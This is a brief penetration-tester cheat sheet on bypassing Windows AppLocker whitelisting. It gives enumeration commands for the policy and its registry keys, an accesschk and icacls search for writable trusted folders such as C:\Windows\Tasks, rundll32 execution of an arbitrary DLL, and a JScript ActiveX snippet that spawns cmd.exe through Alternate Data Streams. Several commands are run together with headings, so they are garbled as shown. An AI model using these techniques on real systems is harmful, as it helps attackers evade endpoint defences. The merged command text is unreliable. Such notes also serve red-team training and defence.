Application Whitelisting Bypass
Get-AppLockerPolicy -Local
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\ExeAppLocker Basic Bypass
Trusted Folders (usually C:\Windows\Tasks is clear)
accesschk.exe "user" C:\Windows -wusicacls.exe C:\Windows\Tasksrundll32 to execute unmanaged DLLs
rundll32 .\TestDll.dll,runAlternate Data Streams (ADS)
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");Find a user writable and executable file (find a file in trusted location)
3rd Party Execution
System binary abuse
https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba
Last updated